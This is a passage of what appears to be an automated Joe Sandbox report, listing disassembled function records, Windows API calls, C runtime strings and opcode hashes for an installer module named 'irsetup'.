                                                                                                                    • Opcode ID: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
                                                                                                                    • Instruction ID: ccdb5c5ed8c45f556dc77aec0225093e2b7ac281c4f631198e9e49a815c37d6e
                                                                                                                    • Opcode Fuzzy Hash: c64cacc54551c1d413d26b4b77fca54a5991493b7637ea44cfe571c06a399083
                                                                                                                    • Instruction Fuzzy Hash: 31F0FC32205A8C82E6D79F26E58036EB360F78CBD4F558124FA5D03795CF38CA958F00

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • free.LIBCMT ref: 00000001800034FF
                                                                                                                      • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
                                                                                                                      • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
                                                                                                                      • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFreeHeapLast_errnofree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3856698052-0
                                                                                                                    • Opcode ID: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
                                                                                                                    • Instruction ID: 24eefc2905acafd760541be8a1a1f06bbdc94ff17dd78c782732821f245c605b
                                                                                                                    • Opcode Fuzzy Hash: 2acc962203dc7ae12ea3bb038dd3365208552806d81bcc30d1bb0bb085e2326a
                                                                                                                    • Instruction Fuzzy Hash: 00C08C94F52F0E82DDAEE2A308D27F800C107AFBC0D80C420F80A8A380DC1CC3AB0B00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: /c $COMSPEC$PATH$cmd.exe$w
                                                                                                                    • API String ID: 2310398763-3679458415
                                                                                                                    • Opcode ID: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
                                                                                                                    • Instruction ID: 9f0d6bfb52196638ce6bad66fd6574380d9c8f482639ba9c857dbbd3f1092ba9
                                                                                                                    • Opcode Fuzzy Hash: 500590a71f3528d87d2e0ac02872d3b0dafdd78488768c422d5b14c18cecb6bd
                                                                                                                    • Instruction Fuzzy Hash: 4522B23220478886FBB7DB65A4517EEB391F78D7C4F548125BA8987B96CF38C649CB00
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID: U
                                                                                                                    • API String ID: 921712934-4171548499
                                                                                                                    • Opcode ID: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
                                                                                                                    • Instruction ID: b99c78c3d65ca0191b994378c1241e68cd305618541e39d27e1f96f7d254ba1e
                                                                                                                    • Opcode Fuzzy Hash: 48a7f9feffc5bfc5e053856909e6f80eec15adabe95c1eaed7459d9126117ee3
                                                                                                                    • Instruction Fuzzy Hash: BF12B23221464986EBA38F25E4443EBB7A0F78C7C4F568116FA89477A5DF39C64DCB10
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: String$free$ByteCharMultiWidemalloc$ErrorLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1837315383-0
                                                                                                                    • Opcode ID: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
                                                                                                                    • Instruction ID: a7cd305ef16002d982a5c2a4af8f81cce234251d115d984bdccc4e66b87c68b2
                                                                                                                    • Opcode Fuzzy Hash: cacc80e21e0b7faa225b9fdaf443091b09f2c2604889e9d2f947d49bd1adc46f
                                                                                                                    • Instruction Fuzzy Hash: D8F19F32200B888AE7A78F25D4407DA77A1FB4CBE8F568615FA5957BD4DF38CB498700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$free$DecodePointer
                                                                                                                    • String ID: PATH
                                                                                                                    • API String ID: 3098740396-1036084923
                                                                                                                    • Opcode ID: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
                                                                                                                    • Instruction ID: 9a3c46973cae5f37c669a60ded91cf3780b69c90c913b2de57871a32441f2394
                                                                                                                    • Opcode Fuzzy Hash: 7f8aa0d2bc419b7ac494ea42fc3385d60b1a286c2162d3fafcbbe687e9060918
                                                                                                                    • Instruction Fuzzy Hash: 0C711631201A8841FBE3AA2195617FF2382AB8D7D9F45C522FE9A077D6DE38C74D8701
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3911551546-0
                                                                                                                    • Opcode ID: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
                                                                                                                    • Instruction ID: 164ba2cb6b460aa59382b2c1d58f859bc5e2f64025dd1feaf38bdf79f172ba54
                                                                                                                    • Opcode Fuzzy Hash: 552b4b0fef55a77f0b16bb130acd12287ff159c4b9a0ed71046dbff09db99d99
                                                                                                                    • Instruction Fuzzy Hash: D591E232214A8882EB93DF65E4907EF7B61F3887D0F558116FA8907BA5CF78C548CB00
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$Heap$ErrorFileLastProcess__doserrno$AllocFreePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3112900366-0
                                                                                                                    • Opcode ID: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
                                                                                                                    • Instruction ID: 8eb280900b96f9cb44dac23b3b5a6d05d6d782666a4f137379f29f380706e389
                                                                                                                    • Opcode Fuzzy Hash: 1acf10fccda49597a569ff7a61e3d259f8e1ce3ac393ce0a89e29cdfbef2b00e
                                                                                                                    • Instruction Fuzzy Hash: 2E419F3530495846FAA7AB759D043EE7391A74EBF0F06C712BA79077D2DE38864A8701
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_errno$ExceptionFilterProcessUnhandled__doserrno$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lock
                                                                                                                    • String ID: SystemRoot$cmd.exe
                                                                                                                    • API String ID: 2783816385-1915010242
                                                                                                                    • Opcode ID: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
                                                                                                                    • Instruction ID: 7d2aedf081fda9467836d831cf405406e94ff08d2ab400320d1a2de9d3ad4fb8
                                                                                                                    • Opcode Fuzzy Hash: f435228b7c99033ebf9bbf731d6440864f99d1bda75eeee7b1c28e628a164daa
                                                                                                                    • Instruction Fuzzy Hash: 44E1D03220568886EBA3DF25E5507EF6791F78DBC4F06C122FA4A97B95CF38C6498701
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$InfoValid$CodeDefaultPageUser_getptd_itow_s
                                                                                                                    • String ID: Norwegian-Nynorsk
                                                                                                                    • API String ID: 2273835618-461349085
                                                                                                                    • Opcode ID: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
                                                                                                                    • Instruction ID: 761428af2cddcf0ece5004559499aa7377a8e36176df394555f2b51de48901ed
                                                                                                                    • Opcode Fuzzy Hash: cd1b9dbfe264d746d2e8f6b4703a042a5d78dbd1592c6507181496ebb6678025
                                                                                                                    • Instruction Fuzzy Hash: 75616F7630078886FBB78F21D4453EA23A0E748BC8F1AC526EA4D467D6DF78CA49C351
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual_lockfree
                                                                                                                    • String ID: COMSPEC$cmd.exe
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: FormatTime$__ascii_stricmpfreemalloc
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F217
                                                                                                                    • GetStdHandle.KERNEL32(?,?,?,?,00000001,000000018002F3B0,?,?,?,?,000000018002D415,?,?,00000000,000000018002BF80), ref: 000000018002F323
                                                                                                                    • WriteFile.KERNEL32 ref: 000000018002F35D
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                    • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5DE
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A5F0
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A63B
                                                                                                                    • malloc.LIBCMT ref: 000000018003A6A0
                                                                                                                      • Part of subcall function 000000018002D3E0: _FF_MSGBANNER.LIBCMT ref: 000000018002D410
                                                                                                                      • Part of subcall function 000000018002D3E0: HeapAlloc.KERNEL32(?,?,00000000,000000018002BF80,?,?,00000000,000000018002D26D,?,?,00000000,000000018002D317,?,?,00000000,000000018002C1F5), ref: 000000018002D435
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D459
                                                                                                                      • Part of subcall function 000000018002D3E0: _errno.LIBCMT ref: 000000018002D464
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A6CD
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A707
                                                                                                                    • free.LIBCMT ref: 000000018003A71B
                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,000000018003A7AE), ref: 000000018003A731
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$_errno$AllocByteCharErrorHeapLastMultiWidefreemalloc
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                                                                    • String ID:
APIs
• _lock.LIBCMT ref: 00000001800347DB
• free.LIBCMT ref: 00000001800348D2
  • Part of subcall function 000000018001F30C: RtlFreeHeap.NTDLL(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F322
  • Part of subcall function 000000018001F30C: _errno.LIBCMT ref: 000000018001F32C
  • Part of subcall function 000000018001F30C: GetLastError.KERNEL32(?,?,00000000,000000018002C2C0,?,?,?,000000018001E8ED,?,?,?,?,0000000180026772), ref: 000000018001F334
• ___lc_codepage_func.LIBCMT ref: 000000018003485B
  • Part of subcall function 000000018002BB84: RtlCaptureContext.KERNEL32 ref: 000000018002BBC3
  • Part of subcall function 000000018002BB84: RtlLookupFunctionEntry.KERNEL32 ref: 000000018002BBDC
  • Part of subcall function 000000018002BB84: RtlVirtualUnwind.KERNEL32 ref: 000000018002BC1A
  • Part of subcall function 000000018002BB84: IsDebuggerPresent.KERNEL32 ref: 000000018002BC61
  • Part of subcall function 000000018002BB84: SetUnhandledExceptionFilter.KERNEL32 ref: 000000018002BC6B
  • Part of subcall function 000000018002BB84: UnhandledExceptionFilter.KERNEL32 ref: 000000018002BC76
  • Part of subcall function 000000018002BB84: GetCurrentProcess.KERNEL32 ref: 000000018002BC8C
  • Part of subcall function 000000018002BB84: TerminateProcess.KERNEL32 ref: 000000018002BC9A
Memory Dump Source (identical for every function record in this section)
• Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
Similarity
• API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryErrorFreeFunctionHeapLastLookupPresentTerminateUnwindVirtual___lc_codepage_func_lockfree
• String ID:
• API String ID: 3702655603-0
Similarity
• API ID: DecodePointer_errnofree
• String ID: cmd.exe
• API String ID: 3637258294-723907552
Similarity
• API ID: _errno$DecodePointer_getptd
• String ID: -$e+000$gfff
• API String ID: 2834218312-2620144452
Similarity
• API ID: _errno$ByteCharErrorLastMultiWide
• String ID:
• API String ID: 3895584640-0
Similarity
• API ID: _errno$DecodePointer
• String ID:
• API String ID: 2310398763-0
Similarity
• API ID: _errno$DecodePointer_lock
• String ID:
• API String ID: 2175075375-0
Similarity
• API ID: _errno$DecodePointer_getptd
• String ID: 0$gfffffff
• API String ID: 2834218312-1804767287
Similarity
• API ID: _errno$DecodePointer
• String ID: @
• API String ID: 2310398763-2766056989
APIs
• GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370B3
• GetLocaleInfoA.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 00000001800370F5
• GetACP.KERNEL32(?,?,?,?,00000000,00000001800378EC,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037118
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_isindst$DecodePointer__tzset_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2552603377-0
                                                                                                                    • Opcode ID: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
                                                                                                                    • Instruction ID: a068425ec057d83c032eccabfb2bcb394e40b10ab35c283d6b764921ba1d8b95
                                                                                                                    • Opcode Fuzzy Hash: 94332f3981986e09bb0910da463cacfcd71f2233cd8271649ea0427451d2a9fc
                                                                                                                    • Instruction Fuzzy Hash: B691F9B271074947EF9BDF29D55179A6792E7987C5F04C03AFA098A796EF38C6088B00
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
                                                                                                                    • Instruction ID: f5c319ab33e0a8075ae33812c2a92c3b1c48c1f7b9d2e96434c6b2da3a56c658
                                                                                                                    • Opcode Fuzzy Hash: 9d55c2a6a59a82965daf0e8e646d10d15f0e768c763823f1f9afd29687c29db6
                                                                                                                    • Instruction Fuzzy Hash: D641F472A00A5892F7B7DF65E8017AE3390A7897E4F60C312BA7547AC5CE78C6498B40
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2310398763-0
                                                                                                                    • Opcode ID: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
                                                                                                                    • Instruction ID: 904b913cc3ec980953253aa1da5105bbdd00c7158b6d19c9bc06cc26936a1786
                                                                                                                    • Opcode Fuzzy Hash: 56bfbcb23a128c196e49c81069df4a7ee18435d57266e18776e5003e9f0183c1
                                                                                                                    • Instruction Fuzzy Hash: EF319372714BD985FBA7AB71AC0279E6291B78D7C0F10C526BA4A87B85DF3CC6098701
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$DecodePointer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 2310398763-2766056989
                                                                                                                    • Opcode ID: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
                                                                                                                    • Instruction ID: dd94d8077e03ae22ffc14675778569cb5697c2bb140d0af9ff915d2123f11729
                                                                                                                    • Opcode Fuzzy Hash: e305e226cf207c6d3f1dd86a634ac54eddaa51f416a3df2b113854f6797ccea9
                                                                                                                    • Instruction Fuzzy Hash: 06412C72710A4D45FBA7CB36AC513FA635167A97E8F74C216BE29876D5DF38C2098300
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale$_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1743167714-0
                                                                                                                    • Opcode ID: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
                                                                                                                    • Instruction ID: 9853df9228a634b84d650e4cd0a57f6a8145f4ab692f0d1b0a1c4647dd7ef205
                                                                                                                    • Opcode Fuzzy Hash: b4030c375111dc87c7a81313f96055d9207103059a3c94d77078ed0d4a0bec02
                                                                                                                    • Instruction Fuzzy Hash: 5F614E72300A8897DBBF9A65D9443DE73A1F38C789F51811AE75D87791CF38E6688700
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID: system error %d
                                                                                                                    • API String ID: 3479602957-1688351658
